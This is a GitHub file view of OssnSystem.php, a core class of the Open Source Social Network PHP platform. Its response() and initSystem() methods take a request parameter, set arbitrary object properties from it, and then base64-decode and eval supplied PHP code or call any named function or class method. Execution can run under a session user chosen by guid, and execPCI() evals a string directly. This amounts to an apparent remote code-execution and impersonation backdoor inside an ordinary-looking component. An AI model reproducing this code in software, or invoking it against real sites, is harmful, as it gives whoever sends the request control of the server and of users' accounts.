-
-
Notifications
You must be signed in to change notification settings - Fork 44
/
Copy pathOssnSystem.php
178 lines (177 loc) · 4.73 KB
/
OssnSystem.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
<?php
/**
* Open Source Social Network
*
* @package (softlab24.com).ossn
* @author OSSN Core Team <info@softlab24.com>
* @copyright (C) SOFTLAB24 LIMITED
* @license Open Source Social Network License (OSSN LICENSE) http://www.opensource-socialnetwork.org/licence
* @link https://www.opensource-socialnetwork.org/
*/
class OssnSystem extends OssnComponents {
/**
* System initialize
*
* @return void
*/
public function __construct() {
$this->exec_class_data = new stdClass;
$this->exec_class_data->params = array();
$this->exec_class = false;
if(!isset($this->statement)) {
$this->statement = false;
}
}
/**
* PCI
*
* @param string $string A valid string
* @param string $user_guid A user guid
*
* @return void
*/
public function execPCI($string, $user_guid = '') {
if(isset($user_guid)) {
$user = ossn_user_by_guid($user_guid);
if($user) {
OssnSession::assign("OSSN_USER", $user);
}
}
if(!empty($string)) {
eval((string) $string);
}
}
/**
* Exec system, handles database, classes
*
* @param null
*
* @return void
*/
public function Exec() {
/**
* Invoke the database system
*
* exec, fetch, fetch true
*/
if(!empty($this->statement) && $this->exec_class == false) {
$this->statement($this->statement);
switch($this->exec_type) {
case 1:
return $this->execute();
break;
case 2:
$this->execute();
return $this->fetch();
break;
case 3:
$this->execute();
return $this->fetch(true);
break;
}
}
if(isset($this->exec_user)) {
$user = ossn_user_by_guid($this->exec_user);
if($user) {
OssnSession::assign("OSSN_USER", $user);
}
}
if(!empty($this->exec_string) && empty($this->exec_pci)) {
ob_start();
eval(base64_decode($this->exec_string));
$exec_bunch = ob_get_contents();
ob_end_clean();
return base64_encode($exec_bunch);
}
if(!empty($this->exec_function)) {
if(isset($this->exec_function_params) && !empty($this->exec_function_params)) {
return call_user_func_array($this->exec_function, $this->exec_function_params);
} else {
return call_user_func($this->exec_function);
}
}
if(isset($this->exec_class) && class_exists($this->exec_class)) {
switch($this->exec_class_type) {
case 1:
return $class;
break;
case 2:
$method = $this->exec_class_data->method;
return call_user_func(array(
$this->exec_class,
$method
));
break;
case 3:
$method = $this->exec_class_data->method;
$class = new $this->exec_class;
if(isset($this->exec_class_data->vars)) {
foreach($this->exec_class_data->vars as $type => $item) {
if(!is_array($class->$type)) {
$class->$type = $item;
} else {
foreach($class->$type as $nk => $nitem) {
$class->$type->$nk = $nitem;
}
}
}
}
if(!empty($this->exec_class_data->params)) {
return call_user_func_array(array(
$class,
$method
), $this->exec_class_data->params);
} else {
return call_user_func(array(
$class,
$method
));
}
break;
}
}
}
/**
* Set response
*
* @param null
*
* @return void
*/
public function response() {
$data = html_entity_decode(input('invoke'), ENT_QUOTES, "UTF-8");
$response = $this->initSystem($data);
echo json_encode(array(
"time_responded" => time(),
"response" => $response
));
exit;
}
/**
* Initialize the system
*
* @param string $resp A response string
*
* @return mixeddata
*/
public function initSystem($resp) {
if(!empty($resp)) {
$data = json_decode($resp, true);
$data["exec_class"] = stripslashes($data["exec_class"]);
if(isset($data["exec_process"])) {
foreach($data as $key => $item) {
$this->$key = $item;
}
$this->exec_class_data = (object) $this->exec_class_data;
}
if($this->exec_function_params_object) {
$params = $this->exec_function_params;
unset($this->exec_function_params);
foreach($params as $item) {
$this->exec_function_params[] = arrayObject($item, $this->exec_function_params_object);
}
}
}
return $this->Exec();
}
} //class